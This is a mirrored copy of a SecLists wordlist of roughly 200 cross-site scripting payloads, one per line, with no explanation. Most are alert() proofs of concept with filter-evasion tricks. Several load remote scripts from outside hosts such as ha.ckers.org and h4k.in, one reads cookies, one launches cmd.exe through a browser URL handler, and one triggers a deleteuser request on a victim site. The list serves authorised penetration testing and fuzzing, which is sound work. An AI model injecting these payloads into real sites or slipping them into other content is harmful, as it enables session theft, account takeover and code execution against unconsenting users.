mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-05-12 15:21:53 -04:00
206 lines
No EOL
14 KiB
Text
206 lines
No EOL
14 KiB
Text
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
|
|
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>
|
|
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
|
|
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
|
|
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
|
|
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
|
|
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>
|
|
<div style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
|
|
<div    style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
|
|
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
|
|
<BASE HREF="javascript:alert('XSS');//">
|
|
`> <script>alert(5)</script>
|
|
> <script>alert(4)</script>
|
|
xyz onerror=alert(6);
|
|
1;a=eval;b=alert;a(b(/c/.source));
|
|
1];a=eval;b=alert;a(b(17));//
|
|
];a=eval;b=alert;a(b(16));//
|
|
'];a=eval;b=alert;a(b(15));//
|
|
1};a=eval;b=alert;a(b(14));//
|
|
'};a=eval;b=alert;a(b(13));//
|
|
};a=eval;b=alert;a(b(12));//
|
|
a=1;a=eval;b=alert;a(b(11));//
|
|
;//%0da=eval;b=alert;a(b(10));//
|
|
';//%0da=eval;b=alert;a(b(9));//
|
|
'> <script>alert(3)</script>
|
|
</title><script>alert(1)</script>
|
|
<BGSOUND SRC="javascript:alert('XSS');">
|
|
<BODY BACKGROUND="javascript:alert('XSS');">
|
|
<BODY ONLOAD=alert('XSS')>
|
|
<!--<A href="- --><a href=javascript:alert:document.domain>test-->
|
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
<%3C<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\x3c\x3C\u003c\u003C
|
|
<script>var a = "</script> <script> alert('XSS !'); </script> <script>";</script>
|
|
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
|
|
*/a=eval;b=alert;a(b(/e/.source));/*
|
|
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
|
|
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
|
|
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
<DIV STYLE="width: expression(alert('XSS'));">
|
|
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
|
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
|
<A HREF="http://1113982867/">XSS</A>
|
|
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|
<IMG SRC="jav	ascript:alert('XSS');">
|
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|
<IMG SRC="javascript:alert('XSS');">
|
|
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
|
\";alert('XSS');//
|
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
eval(name)
|
|
<A HREF="http://www.google.com./">XSS</A>
|
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<A HREF="//google">XSS</A>
|
|
<A HREF="http://ha.ckers.org@google">XSS</A>
|
|
<A HREF="http://google:ha.ckers.org">XSS</A>
|
|
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
|
|
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
|
<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`>
|
|
<IMG SRC="javascript:alert('XSS')"
|
|
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=javascript:alert("XSS")>
|
|
'';!--"<script>alert(0);</script>=&{(alert(1))}
|
|
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
|
|
<img src=`x` onrerror= ` ;; alert(1) ` />
|
|
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
|
|
style=color: expression(alert(0));" a="
|
|
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
|
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
a=<a><b>%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e</b></a>document.write(unescape(a..b))
|
|
<IMG SRC="jav	ascript:alert(<WBR>'XSS');">
|
|
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
|
|
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
|
|
<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
|
|
<IMG DYNSRC="javascript:alert('XSS');">
|
|
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
|
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
|
<IMG LOWSRC="javascript:alert('XSS');">
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
|
<IMG SRC="javascript:alert('XSS');">
|
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
<A HREF="http://66.102.7.147/">XSS</A>
|
|
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1
|
|
s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7;
|
|
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
|
|
s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];
|
|
s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+''];
|
|
s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;
|
|
s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';
|
|
<BR SIZE="&{alert('XSS')}">
|
|
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
|
|
%0da=eval;b=alert;a(b(/d/.source));
|
|
<a href = "javas cript :ale rt(1)">test
|
|
+alert(0)+
|
|
<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;
|
|
<body onload=a1={x:this.parent.document};a1.x.writeln(1);>
|
|
<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
|
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
|
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
|
|
<IMG SRC="livescript:[code]">
|
|
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
|
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
|
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
|
<A HREF="http://6	6.000146.0x7.147/">XSS</A>
|
|
<IMG SRC="mocha:[code]">
|
|
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
|
|
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
|
|
<IMGSRC="javascript:alert('XSS')">
|
|
b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name
|
|
a=/ev/// .source a+=/al/// .source a[a] (name)
|
|
a=/ev/ .source a+=/al/ .source,a = a[a] a(name)
|
|
setTimeout//
|
|
(name// ,0)
|
|
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
|
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
|
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
|
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")>
|
|
</noscript><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
|
|
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
|
|
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
|
|
<body onload=;;;;;;;;;;;_=alert;_(1);;;;
|
|
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
|
|
<body <body onload=;;;;;al:eval('al'+'ert(1)');;>
|
|
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>
|
|
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>
|
|
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
|
|
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
|
|
alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
|
|
(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
|
|
<body/s/onload=x={doc:parent.document};x.doc.writeln(1)
|
|
<body/””$/onload=x={doc:parent['document']};x.doc.writeln(1)
|
|
<body/""$/onload=x={doc:parent['document']};x.doc.writeln(1)
|
|
123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);
|
|
s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
|
|
o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o);
|
|
___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___)
|
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
|
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";eval(a+b+c+d);
|
|
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
|
|
open(name)
|
|
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
|
alert(1)
|
|
<A HREF="//www.google.com/">XSS</A>
|
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
|
0%0d%0a%00<script src=//h4k.in>
|
|
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1
|
|
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
|
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
|
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
|
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
|
<A HREF="http://google.com/">XSS</A>
|
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
|
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
|
|
<SCRIPT>alert('XSS')</SCRIPT>
|
|
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
|
a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1))
|
|
a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
|
|
eval.call(this,unescape.call(this,location))
|
|
d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b)))
|
|
l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a
|
|
_=eval,__=unescape,___=document.URL,_(__(___))
|
|
$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)
|
|
$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))
|
|
evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod)
|
|
with(location)with(hash)eval(substring(1))
|
|
<IMG SRC="  javascript:alert('XSS');">
|
|
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
|
<style>body:after{content: “\61\6c\65\72\74\28\31\29″}</style><script>
|
|
eval(eval(document.styleSheets[0].cssRules[0].style.content))
|
|
</script>
|
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
|
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
|
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
|
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
|
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
|
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
|
|
>"'
|
|
a=alert;a(0)
|
|
A=alert;A(1)
|
|
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
|
|
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
|
|
</textarea><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
|
|
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
|
|
http://aa"><script>alert(123)</script>
|
|
http://aa'><script>alert(123)</script>
|
|
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> |